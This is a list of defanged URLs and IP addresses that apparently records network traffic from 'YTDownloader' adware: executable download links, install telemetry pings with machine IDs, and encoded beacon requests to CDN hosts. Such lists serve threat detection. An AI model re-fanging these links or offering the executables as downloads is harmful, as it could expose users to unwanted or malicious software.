hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=hWfaA75NtHH85nz5m58wW3Ryfx22RDGQQn7xBp tRz8r4Spdf2ZexFyzOKLYTqXCsGG6qLQR8LceI9VTThLJ3QUOVwUN6qMm8gbXZsuvvibpKDN532NTcQ01xTGsf88 UxX212nyBDCa/en1gDcOKJEEbwQeHz5MQI4IYW7BlwKG/8 ILd4bihRW JECizii0o6CnERxfiZ26V9rLf5AefUXC4FfWEqIYCpHZc9ZUaF7EORqfQiLE44G r 3F6T7f9F3I6C91SWT/e9lpr/riA==	54.239.168.183
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=1ZEnpGuz/IRMWLJLfNOM3nRyfx22RDGQ 3BljJYGbcAr4Spdf2ZexFyzOKLYTqXCsGG6qLQR8LceI9VTThLJ3QUOVwUN6qMm8gbXZsuvvibpKDN532NTcQ01xTGsf88 UxX212nyBDCa/en1gDcOKJEEbwQeHz5MQI4IYW7BlwKG/8 ILd4bihRW JECizii0o6CnERxfiZ26V9rLf5AeeOz7ih67i0zYCpHZc9ZUaHn8nmukLEERo4G r 3F6T7f9F3I6C91SWT/e9lpr/riA==	54.239.168.183
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/12466.ashx?e=k64GogClQtV0cn8dtkQxkPtwZYyWBm3A/lCDRYG1zoqEh7ps0SQ7EYzpbjeDHyvNqJDnlUORNKJFgAYD7IlOOSp LYLDcsF6Odloy4EgwsYQeCU3GvakyerVyaMS1AoBVcsZgjOTLBig1VAsf0FmYjkTFPZ1 JDTyBfkdHFoABciDxPRY4o5upR90anDedSCd9HiXvVRh4g0C52NwzQxay5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAcC4K0pGUhWjZ3f64oXp7sfQ8Kj6Mu8v3vRYAGA yJTjkqfi2Cw3LBejnZaMuBIMLGjDD0PkkuB5A=	198.232.124.192
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=aQQpsP6/AW3kex8By7Tt8zRFyso9cgVYusz/yP3Ks9EegceCn LKWe/lQO2eO0N8r J80GV4qARlUrzhzYzRp7 srzHUOTm5Cd3FHp 6lvDMpb3phhqpJJQzpy6nz8DG6TnR9dT7ayg3fHrFM BTebXDbzJkSidOU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOT021585MfhSpFgjcTf6rNyqUVvKp9Lg9XHvdM54V2LCI4G r 3F6T7NPnGVVVl/P0B6w5tb RMu8qEoEbTUKVP	54.239.168.183
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/14314.ashx?e=AmLJM6c3sNcinMwQKODRlNMKbKv8c5VnIM0CqmsRfbs08bEgFRb3JLee7JGyVH1lRdb/S8YKHkPcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HpS5W6ywluOr7GRIcOoydhUdGPD1b2Qs4hf6pZ97v1E3PTyAJF5AGGpjkZwwc6dH6FzoNt4Ofsjzs1eJiiYYwojgb6v7cXpPt9ePa7EDGSBlkjSRpv2UaTaJBfeNRzkdxluevdybjIM/AF/Crll2X X6ABQ4xl C6XAmRABUbmSYRA5W RLpwIoLj8WN7CI8VJWpTUhdoetbAQhJgQ701LudQlG124a8hFOTAwlw8YF8d71y2H I42iBFaADrPTvGxo tMAskzjw==	198.232.124.192
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/14314.ashx?e=AmLJM6c3sNcinMwQKODRlNMKbKv8c5VnIM0CqmsRfbs08bEgFRb3JLee7JGyVH1lRdb/S8YKHkPcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HpS5W6ywluOr7GRIcOoydhUdGPD1b2Qs4hf6pZ97v1E3PTyAJF5AGGpjkZwwc6dH4myeS/0faBVTdVMo67fxO0s IILilpWF0ZnIhubsYOdECOCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mOWTBRoXJJz/rKwD6t b1ZR4j1VNOEsndBQ5XBQ3qoybyBtdmy6 JukoM3nfY1NxsN F7xXEI/M=	198.232.124.192
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/YTDownloaderFull.exe	198.232.124.192
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/14314.ashx?e=AmLJM6c3sNcinMwQKODRlNMKbKv8c5VnIM0CqmsRfbs08bEgFRb3JLee7JGyVH1lRdb/S8YKHkPcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HpS5W6ywluOr7GRIcOoydhUdGPD1b2Qs4hf6pZ97v1E3PTyAJF5AGGpjkZwwc6dH6MAVuazOQA/ySFcG0T/jYU B 0jBTIO6c/Y3m6kr9yYrPiCC4paVhduf EAUeb6vWyyBfgdC/MPMTQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5a7srxy/100X021585MfhSh3bXYBh5GayOJOBpub70rKjwza u12Vx7RZKInXq6ldftzHLLheHCE=	198.232.124.192
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/14314.ashx?e=AmLJM6c3sNcinMwQKODRlNMKbKv8c5VnIM0CqmsRfbs08bEgFRb3JLee7JGyVH1lRdb/S8YKHkPcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HpS5W6ywluOr7GRIcOoydhUdGPD1b2Qs4hf6pZ97v1E3PTyAJF5AGGpjkZwwc6dH4myeS/0faBVTdVMo67fxO0s IILilpWF2Et8EPpFBXSUCOCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mOWTBRoXJJz/rKwD6t b1ZR4j1VNOEsndBQ5XBQ3qoybyBtdmy6 JukoM3nfY1NxsN F7xXEI/M=	198.232.124.192
hxxp://d13s98z2lzti92.cloudfront.net/smw121634dp.exe	54.239.168.213
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/14314.ashx?e=GFrjZskQvqNmS6nlSU/NThXyJo8GcS5h/ToTRiVFxVR2M5d6UDxIvpDKf9AB8lI7SlCyq068/M1FOTAwlw8YF8d71y2H I42iBFaADrPTvGxo tMAskzj3wF8xC533Fc8E2Pd9CMWosSO5u5UlyZGWbY4wRb3lZ/gFOqBGDQz2TLS8QKBdwSe29z1KklHinBKYX3Ti/i3YMgCmKZYKupqaMfrJi9XFVPBHdyxBIzcuFiQ3FzN41YlI2ac9bD3MadSN58qZygCScEpVXMQzDInewhsAaqZyLDqaP5RI6XgJQcxXLgDRmHLOkFT1T v92w3K GUZ6Kk1U0g9pFu/21ITrGUl3SHv B3WYfPFwahBc=	198.232.124.192
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/14314.ashx?e=xY8ohDYpM iI4k8LaFSbfxwGEJPpfW5hnvZi s3jtzH3VPP0BYZZ/JwQnkcbjmdiLntfO9v5CwenNguChnjFYxzmkHxvj2IRXcgr8gwCjoRxb8Oz3NykvhuQZCu9SilNqGvv5sqhroCJzCloYCM2TyBeHeUDdpdJ0ATae6NSkcuPFGXl7hYw KKij 6dP1w7xUocEPa3gnWqHhSQCg8CtCUHeR8YCF3QLiqBH6WCl3xZWevahYfV1 gAUOMZfgulwJkQAVG5kmEQOVvkS6cCKC4/FjewiPFSVqU1IXaHrWwEISYEO9NS7nUJRtduGvIRTkwMJcPGBfHe9cth/iONogRWgA6z07xsaPrTALJM48=	198.232.124.192
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/14314.ashx?e=AOb NGCDna90cn8dtkQxkERusJn/tOCq/lCDRYG1zoqEh7ps0SQ7EYzpbjeDHyvNqJDnlUORNKJFgAYD7IlOOSp LYLDcsF6Odloy4EgwsYQeCU3GvakyerVyaMS1AoBVcsZgjOTLBig1VAsf0FmYhhjoXbLyE8FyBfkdHFoABfEKmHddSTlr6/u6Si5KcyuceLsPpRf2XIu YgVzu615FhjFLtNp8mV2lEuQvGIR/fg8uwYzFR1r8TQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5a7srxy/100X021585MfhSh3bXYBh5GayOJOBpub70rKjwza u12Vx7RZKInXq6ldftzHLLheHCE=	198.232.124.192
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/14314.ashx?e=I6hFHi0H7G9mS6nlSU/NTiVyAMJyiE6S/ToTRiVFxVR2M5d6UDxIvpDKf9AB8lI7SlCyq068/M1FOTAwlw8YF8d71y2H I42iBFaADrPTvGxo tMAskzj3wF8xC533Fc8E2Pd9CMWosSO5u5UlyZGWbY4wRb3lZ/EV70QiN1eataC2D7gVLsXVWyif 2VH4gFagtWkIz2IRYYxS7TafJldpRLkLxiEf34PLsGMxUda/E0H2E /K1uqPiYRVVMKy/yijAfjje/ktUzPMZleL5 Wu7K8cv9dNF9NtefOTH4Uod212AYeRmsjiTgabm 9Kyo8M2vrtdlce0WSiJ16upXX7cxyy4Xhwh	198.232.124.192
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/14314.ashx?e=bNFVvuIwcz4inMwQKODRlIqiqZmwl1PqIM0CqmsRfbs08bEgFRb3JLee7JGyVH1lRdb/S8YKHkPcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HpS5W6ywluOr7GRIcOoydhUdGPD1b2Qs4hf6pZ97v1E3PTyAJF5AGG Ruf1p/wWfUh 3ZGDmdW5pZis9f nTddyS4BuUDC9WTdXgG3d7dLtc8OkZQyb4w969Wi5JdYQNAjghhbsGXAob/z4gt3huKFFb4kQKLOKLSjoKcRHF JjlkwUaFySc/6ysA rfm9WUeI9VTThLJ3QUOVwUN6qMm8gbXZsuvvibpKDN532NTcbDfhe8VxCPz	198.232.124.192
hxxp://www.ytdownloader.com/app/ping.ashx?action=S_INSTALL&usid=1844237615-1960408961-1801674531&aff=&rnd=&v=1.0.11487.1216&url=&title=&pingtext=Files& protocol=&size=0&ref=&browser=	107.20.238.80
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/14314.ashx?e=/TVH52TeC6QinMwQKODRlGRUqvu659HFIM0CqmsRfbs08bEgFRb3JLee7JGyVH1lRdb/S8YKHkPcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HpS5W6ywluOr7GRIcOoydhUdGPD1b2Qs4hf6pZ97v1E3PTyAJF5AGGDDbltvqAzQDxmCcB9WVISvSrmvhzpIGq0JQd5HxgIXe2KZEzW03QC5KGZ7N/WHCaCHzyr AmlG5QSjSVhgDAFHThq7RcDdX0CipiMYwH g4ekVEtTIIfNSSWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJMQkn33NAlOpViA7TIcAcSxgCqL7xsniQvSm4upuKAkYqi3Apbk6qiCP3BdDD5/c0cA0ak5bBzFhOSDd4/R9r/g==	198.232.124.192
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/14314.ashx?e=/TVH52TeC6QinMwQKODRlGRUqvu659HFIM0CqmsRfbs08bEgFRb3JLee7JGyVH1lRdb/S8YKHkPcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HpS5W6ywluOr7GRIcOoydhUdGPD1b2Qs4hf6pZ97v1E3PTyAJF5AGGDDbltvqAzQCw6kHnR XV4QBZGQjpShx/0JQd5HxgIXcFljvsbds7FP1MD0RZMJTghpRaG5UbXNBLHocoDBHKKK/1bjUefs49JU1ySiay1sqdymVuPyjsZ40oQa07NiSGHSvtnkZb9H9Fc ZH5YnXW9iHRMVKaBRE8NVcbx dWxSReJECB10wJoxWgtYjek0xghq6RzWLsFaV2a3pWCTy1K5oVP3GqZY3pzYLgoZ4xWMc5pB8b49iEV3IK/IMAo6EcW/Ds9zcpL4qcbOV8TZlZQ==	198.232.124.192
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=b1dRW7RxYKcVc8R/SQUwTCKczBAo4NGUZFSq 7rn0cUUMN9W/ 8fb24W0T1hU8VMkYIKgNqWBwS9Kbi6m4oCRiqLcCluTqqII/cF0MPn9zRwDRqTlsHMWP9XPbJELwvM4ER/zOphe9XjDyrjfLHdhwq6l7mVDuU2U7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOT021585MfhStCC/vmINmoCk0XByrlXk6Xa2GUTuqDbKtCUHeR8YCF3Kke2ijo/txBIBrCYEM0Ntm0iRlndgoD0	54.239.168.183
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=I6hFHi0H7G9mS6nlSU/NTuiRTIWym4 0QVpVqTl5/e4gLxC0aXqYrfauHCM4PoUS28zA03xwxN7DRdbCExQ3XkCOCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mdulfay3 QHl32cx0G27ZSGAqR2XPWVGh9o0hxHg3iWEUAvnawhe3hfCt1Zpc0u8z	54.239.168.183
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=I6hFHi0H7G9mS6nlSU/NTuiRTIWym4 0QVpVqTl5/e5zgOiYPM 1xJkMnbu79FzppzYLgoZ4xWMc5pB8b49iEV3IK/IMAo6EcW/Ds9zcpL4bkGQrvUopTfauHCM4PoUS28zA03xwxN7DRdbCExQ3XkCOCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mdulfay3 QHl32cx0G27ZSGAqR2XPWVGh9o0hxHg3iWEUAvnawhe3hTfh8cjilZ M3GKWlWmZ3GY=	54.239.168.183
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/wu.ashx?dsid=1&s=F8Tzamodk0,99999999-9999-4ee6-b5f5-a35f9c2d9d06,&v=2.3.12.1634&mid=A0A7AiA9A7AAA1AiA7ieA1A91J7L773DiLAiiAA13D1J&usetmd5=&bmd5=&hpp=1&spp=1&ntp=1&ubrand=sc	198.232.124.192
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/14314.ashx?e=uWabAt9SLcwPgAd18hbyrmUt3CZAwIBE/Dn8i7qp5mB38psj3UbutFu0ICSu0QOYghmiZJc6KBe9Kbi6m4oCRiqLcCluTqqII/cF0MPn9zRwDRqTlsHMWP9XPbJELwvM20qHT6WNWM6mY5NIfEeUImHMzOJbNDghLEkZetWvu6sPlKHaI/HhOX8O9MdkgAq0BPEhRyyBD7Az2B3hsM2vVSEmR0fmM6EAe iMFhlMCXZIMYvTWghruEu7UYQsvpwcimSmM1eJuDuHIpRMDfJ5hDuF6IuT3DfqjZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HdZh88XBqEFw==	198.232.124.192
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/14314.ashx?e=hNMAVKhukrzd/jwMCMorqnRyfx22RDGQs1FW/TpGzIP UINFgbXOioSHumzRJDsRjOluN4MfK82okOeVQ5E0okWABgPsiU45Kn4tgsNywXo52WjLgSDCxhB4JTca9qTJ6tXJoxLUCgFVyxmCM5MsGKDVUCx/QWZiGGOhdsvITwVAbULHJpnG/4XOg23g5 yPOzV4mKJhjCiOBvq/txek z4HsrR8MHCWlUGZM/ipg 4PIAIQtwrEX1/kTVIpb8Jsqp9Xc7DttahTvMZjEVVmTm 4 SQMoieQ8Lxp8HLogowR591rTzu05D5OeSwUDdva2hNibsqR5hVlUrzhzYzRp7 srzHUOTm5Cd3FHp 6lvDMpb3phhqpJJEKkB5GbhZH	198.232.124.192
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/12466.ashx?e=hNMAVKhukrzd/jwMCMorqnRyfx22RDGQs1FW/TpGzIP UINFgbXOioSHumzRJDsRjOluN4MfK82okOeVQ5E0okWABgPsiU45Kn4tgsNywXo52WjLgSDCxhB4JTca9qTJ6tXJoxLUCgFVyxmCM5MsGKDVUCx/QWZiORMU9nX4kNMjBc8MQwUMZZmrFmLJ4RM0tNH56RfInM z4gguKWlYXah KANE5N7oCaDOhvvrNRpfoAFDjGX4LpcCZEAFRuZJhEDlb5EunAiguPxY3sIjxUlalNSF2h61sBCEmBDvTUu51CUbXbhryEU5MDCXDxgXx3vXLYf4jjaIEVoAOs9O8bGj60wCyTOP	198.232.124.192
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/12466.ashx?e=hNMAVKhukrzd/jwMCMorqnRyfx22RDGQs1FW/TpGzIP UINFgbXOioSHumzRJDsRjOluN4MfK82okOeVQ5E0okWABgPsiU45Kn4tgsNywXo52WjLgSDCxhB4JTca9qTJ6tXJoxLUCgFVyxmCM5MsGKDVUCx/QWZiORMU9nX4kNMjBc8MQwUMZZmrFmLJ4RM0tNH56RfInM z4gguKWlYXeP7nOBaVPXWjZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HdZh88XBqEFw==	198.232.124.192
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/14314.ashx?e=hNMAVKhukrzd/jwMCMorqnRyfx22RDGQs1FW/TpGzIP UINFgbXOioSHumzRJDsRjOluN4MfK82okOeVQ5E0okWABgPsiU45Kn4tgsNywXo52WjLgSDCxhB4JTca9qTJ6tXJoxLUCgFVyxmCM5MsGKDVUCx/QWZiGGOhdsvITwVAbULHJpnG/5mrFmLJ4RM0tNH56RfInM z4gguKWlYXfSnAquWIhOHxfjsn07DILhkm3E/dlMY S5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAcC4K0pGUhWjZ3f64oXp7sfQ8Kj6Mu8v3vRYAGA yJTjkqfi2Cw3LBejnZaMuBIMLGjDD0PkkuB5A=	198.232.124.192
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/14314.ashx?e=c2mW1WEUbCFmS6nlSU/NTmTSvfLK6KnR/ToTRiVFxVR2M5d6UDxIvpDKf9AB8lI7SlCyq068/M1FOTAwlw8YF8d71y2H I42iBFaADrPTvGxo tMAskzj3wF8xC533Fc8E2Pd9CMWosSO5u5UlyZGWbY4wRb3lZ/U7MEatNnCEgXCfGg4gcTppNB3Tmp8 xhs IILilpWF0OiEhuPxDpVu4qmcipTkY2jZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HdZh88XBqEFw==	198.232.124.192
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/14314.ashx?e=QHucCbLl /arv6GrtwjWz3Ryfx22RDGQfNujG4MuC7j UINFgbXOioSHumzRJDsRjOluN4MfK82okOeVQ5E0okWABgPsiU45Kn4tgsNywXo52WjLgSDCxhB4JTca9qTJ6tXJoxLUCgFVyxmCM5MsGKDVUCx/QWZiGGOhdsvITwUjBc8MQwUMZYYsZ7QYFDFnxHXZjfhFnaKOBvq/txek 98kq5tFPGRg8hLIAT6TbharyaFrt1ZytQQr15Tmip jZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HdZh88XBqEFw==	198.232.124.192
hxxp://d23ocewf5ttxmu.cloudfront.net/br.ashx?pid={PID}&aid={AID}&ss=0&s=F8Tzamodk0,99999999-9999-4ee6-b5f5-a35f9c2d9d06,&v=2.3.12.1634&md5=c9201ba296c08848dfd3d5e86b7c34eb&mid=A0A7AiA9A7AAA1AiA7ieA1A91J7L773DiLAiiAA13D1J&uid=8AD3F1FB-4DE5-44BF-9F6B-81BABBE96DC1	54.239.168.233
hxxp://d23ocewf5ttxmu.cloudfront.net/br.ashx?pid={PID}&aid={AID}&ss=0&s=F8Tzamodk0,99999999-9999-4ee6-b5f5-a35f9c2d9d06,&v=2.3.12.1634&md5=51a316be89f997dfa063898329266c69&mid=A0A7AiA9A7AAA1AiA7ieA1A91J7L773DiLAiiAA13D1J&uid=8AD3F1FB-4DE5-44BF-9F6B-81BABBE96DC1	54.239.168.233
hxxp://d23ocewf5ttxmu.cloudfront.net/br.ashx?pid={PID}&aid={AID}&bur=1&ss=0&s=F8Tzamodk0,99999999-9999-4ee6-b5f5-a35f9c2d9d06,&v=2.3.12.1634&md5=c9201ba296c08848dfd3d5e86b7c34eb&mid=A0A7AiA9A7AAA1AiA7ieA1A91J7L773DiLAiiAA13D1J&uid=8AD3F1FB-4DE5-44BF-9F6B-81BABBE96DC1	54.239.168.233
hxxp://rep.ytdownloader.com/app/ping.ashx?action=start&userid={C41FEF8F-ADBB-4F68-BEA7-CDD74FDBA6CA}&usid=1844237615-1960408961-1801674531&aff=&v=1.0.11487.1216&url=&title=&pingtext=IGNvbnZlcnRlcjogMy4zLjEuNTsgZHJpdmVyOiBDOlxQcm9ncmFtIEZpbGVzXFlURG93bmxvYWRlclxzYm1udHIuc3lzIDEuMC4wLjI7IGhlbHBlcjogMS4wLjEuNTsgc2VydmljZTogMS4wLjEuNTsA&protocol=&size=0&ref=&browser=	54.197.238.106
hxxp://pwvz71qp-ur1xo6pn.netdna-ssl.com/wu.ashx?dsid=1&s=F8Tzamodk0,99999999-9999-4ee6-b5f5-a35f9c2d9d06,&v=2.3.12.1634&mid=A0A7AiA9A7AAA1AiA7ieA1A91J7L773DiLAiiAA13D1J&usetmd5=&bmd5=&hpp=1&spp=1&ntp=1&ubrand=sc	198.232.124.192
hxxp://otr4vhc-1ghhyl1c.netdna-ssl.com/YTDownloaderFull.exe	198.232.124.192
hxxp://1dfgnb-mzxspesu.netdna-ssl.com/14314.ashx?e=AmLJM6c3sNcinMwQKODRlNMKbKv8c5VnIM0CqmsRfbs08bEgFRb3JLee7JGyVH1lRdb/S8YKHkPcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HpS5W6ywluOr7GRIcOoydhUdGPD1b2Qs4hf6pZ97v1E3PTyAJF5AGGpjkZwwc6dH6MAVuazOQA/ySFcG0T/jYU B 0jBTIO6c/Y3m6kr9yYrPiCC4paVhduf EAUeb6vWyyBfgdC/MPMTQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5a7srxy/100X021585MfhSh3bXYBh5GayOJOBpub70rKjwza u12Vx7RZKInXq6ldftzHLLheHCE=	198.232.124.192
hxxp://1dfgnb-mzxspesu.netdna-ssl.com/14314.ashx?e=I6hFHi0H7G9mS6nlSU/NTiVyAMJyiE6S/ToTRiVFxVR2M5d6UDxIvpDKf9AB8lI7SlCyq068/M1FOTAwlw8YF8d71y2H I42iBFaADrPTvGxo tMAskzj3wF8xC533Fc8E2Pd9CMWosSO5u5UlyZGWbY4wRb3lZ/EV70QiN1eataC2D7gVLsXVWyif 2VH4gFagtWkIz2IRYYxS7TafJldpRLkLxiEf34PLsGMxUda/E0H2E /K1uqPiYRVVMKy/yijAfjje/ktUzPMZleL5 Wu7K8cv9dNF9NtefOTH4Uod212AYeRmsjiTgabm 9Kyo8M2vrtdlce0WSiJ16upXX7cxyy4Xhwh	198.232.124.192
hxxp://1dfgnb-mzxspesu.netdna-ssl.com/14314.ashx?e=AmLJM6c3sNcinMwQKODRlNMKbKv8c5VnIM0CqmsRfbs08bEgFRb3JLee7JGyVH1lRdb/S8YKHkPcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HpS5W6ywluOr7GRIcOoydhUdGPD1b2Qs4hf6pZ97v1E3PTyAJF5AGGpjkZwwc6dH4myeS/0faBVTdVMo67fxO0s IILilpWF0ZnIhubsYOdECOCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mOWTBRoXJJz/rKwD6t b1ZR4j1VNOEsndBQ5XBQ3qoybyBtdmy6 JukoM3nfY1NxsN F7xXEI/M=	198.232.124.192
hxxp://1dfgnb-mzxspesu.netdna-ssl.com/14314.ashx?e=AmLJM6c3sNcinMwQKODRlNMKbKv8c5VnIM0CqmsRfbs08bEgFRb3JLee7JGyVH1lRdb/S8YKHkPcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HpS5W6ywluOr7GRIcOoydhUdGPD1b2Qs4hf6pZ97v1E3PTyAJF5AGGpjkZwwc6dH4myeS/0faBVTdVMo67fxO0s IILilpWF2Et8EPpFBXSUCOCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mOWTBRoXJJz/rKwD6t b1ZR4j1VNOEsndBQ5XBQ3qoybyBtdmy6 JukoM3nfY1NxsN F7xXEI/M=	198.232.124.192
hxxp://1dfgnb-mzxspesu.netdna-ssl.com/12466.ashx?e=hNMAVKhukrzd/jwMCMorqnRyfx22RDGQs1FW/TpGzIP UINFgbXOioSHumzRJDsRjOluN4MfK82okOeVQ5E0okWABgPsiU45Kn4tgsNywXo52WjLgSDCxhB4JTca9qTJ6tXJoxLUCgFVyxmCM5MsGKDVUCx/QWZiORMU9nX4kNMjBc8MQwUMZZmrFmLJ4RM0tNH56RfInM z4gguKWlYXeP7nOBaVPXWjZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HdZh88XBqEFw==	198.232.124.192
hxxp://1dfgnb-mzxspesu.netdna-ssl.com/14314.ashx?e=2fVCHF6kf8jCiOnT8Um5ojRFyso9cgVY/xQAo/408bbCigHpURgZKxfMv/l 8Q4Wfl0yK7ww8bQbTivYZlBvEDiTgabm 9Kyo8M2vrtdlce0WSiJ16upXTcGS76lfQpPfkKZPeLk1IXa8iDQLHG9ikTL6x/aszFCRyUoQuKpbN1YtrOl7BfDWA5Mtw6p9U5dKYX3Ti/i3YNxO48S9k5zx0ojLX6lvBJsJJaSIP7xohYUBsO8O21po8 3fSmiw/OP3dCJ6xxp AkxCSffc0CU6lWIDtMhwBxLGAKovvGyeJC9Kbi6m4oCRiqLcCluTqqII/cF0MPn9zRwDRqTlsHMWE5IN3j9H2v	198.232.124.192
hxxp://1dfgnb-mzxspesu.netdna-ssl.com/12466.ashx?e=iAb9K1DDBHUinMwQKODRlCD/q4eoirb7IM0CqmsRfbtxTYwWxYG9WEEY41XBMtFk/h9mchShIbTzFrgVq4jsEiR1q1S/V1rzDyhRDL0PLalNTvXaKqGxaNCUHeR8YCF3BQ8MIYMfS0tAjghhbsGXAob/z4gt3huKFFb4kQKLOKLSjoKcRHF JoXwql6nKegU	198.232.124.192
hxxp://1dfgnb-mzxspesu.netdna-ssl.com/12466.ashx?e=K24uUiBczqdmS6nlSU/NTrtoX8KCsVAM/ToTRiVFxVR2M5d6UDxIvpDKf9AB8lI7SlCyq068/M1FOTAwlw8YF8d71y2H I42iBFaADrPTvGxo tMAskzj3wF8xC533Fc8E2Pd9CMWosSO5u5UlyZGSoNjFwE9Y5NLhu0b45kiT yMyEnHNejvIwWNawbTP05KYX3Ti/i3YObVFZJeaqFdk1VfCEU0AOklTie0zE 5RJfoAFDjGX4LpcCZEAFRuZJhEDlb5EunAiguPxY3sIjxUlalNSF2h61sBCEmBDvTUu51CUbXbhryEU5MDCXDxgXx3vXLYf4jjaIEVoAOs9O8bGj60wCyTOP	198.232.124.192
hxxp://1dfgnb-mzxspesu.netdna-ssl.com/14314.ashx?e=AOb NGCDna90cn8dtkQxkERusJn/tOCq/lCDRYG1zoqEh7ps0SQ7EYzpbjeDHyvNqJDnlUORNKJFgAYD7IlOOSp LYLDcsF6Odloy4EgwsYQeCU3GvakyerVyaMS1AoBVcsZgjOTLBig1VAsf0FmYhhjoXbLyE8FyBfkdHFoABfEKmHddSTlr6/u6Si5KcyuceLsPpRf2XIu YgVzu615FhjFLtNp8mV2lEuQvGIR/fg8uwYzFR1r8TQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5a7srxy/100X021585MfhSh3bXYBh5GayOJOBpub70rKjwza u12Vx7RZKInXq6ldftzHLLheHCE=	198.232.124.192
hxxp://1dfgnb-mzxspesu.netdna-ssl.com/14314.ashx?e=/9ZmISdorEsAVnWQbAnLWDRFyso9cgVY/xQAo/408bbCigHpURgZKxfMv/l 8Q4Wfl0yK7ww8bQbTivYZlBvEDiTgabm 9Kyo8M2vrtdlce0WSiJ16upXTcGS76lfQpPfkKZPeLk1IXa8iDQLHG9ikTL6x/aszFCRyUoQuKpbN1YtrOl7BfDWKv9x4TEPS62BPEhRyyBD7DR614fwrEG1qQdf661A7a3sYns0spGP2dTvMZjEVVmTm 4 SQMoieQ8Lxp8HLogowR591rTzu05D5OeSwUDdva2hNibsqR5hVlUrzhzYzRp7 srzHUOTm5Cd3FHp 6lvDMpb3phhqpJJEKkB5GbhZH	198.232.124.192
hxxp://1dfgnb-mzxspesu.netdna-ssl.com/14314.ashx?e=2fVCHF6kf8jCiOnT8Um5ojRFyso9cgVY/xQAo/408bbCigHpURgZKxfMv/l 8Q4Wfl0yK7ww8bQbTivYZlBvEDiTgabm 9Kyo8M2vrtdlce0WSiJ16upXTcGS76lfQpPfkKZPeLk1IXa8iDQLHG9ikTL6x/aszFCRyUoQuKpbN1YtrOl7BfDWL9PKObAHk8Ms IILilpWF0oVqJUL9ojcMbrniShQ3GQLdA rHOtLvrw1VxvH51bFJF4kQIHXTAmjFaC1iN6TTGCGrpHNYuwVpXZrelYJPLUrmhU/capljenNguChnjFYxzmkHxvj2IRXcgr8gwCjoRxb8Oz3Nykvipxs5XxNmVl	198.232.124.192
hxxp://1dfgnb-mzxspesu.netdna-ssl.com/14314.ashx?e=PcwT4QFtuPDEA05CBT6a0a4CrgF/oVkXhiJeNe9dCpGmy6t0 u4xzf2TEkHeJNDU8E2Pd9CMWosSO5u5UlyZGWbY4wRb3lZ/Lhu0b45kiT/XpciovEgse2DHUe356ADpreizXIw2lEXuAG0Hn6RhSl2loKLeLycAJJaSIP7xohYUBsO8O21po8 3fSmiw/OP3dCJ6xxp AmkdnXmY5ntEg==	198.232.124.192
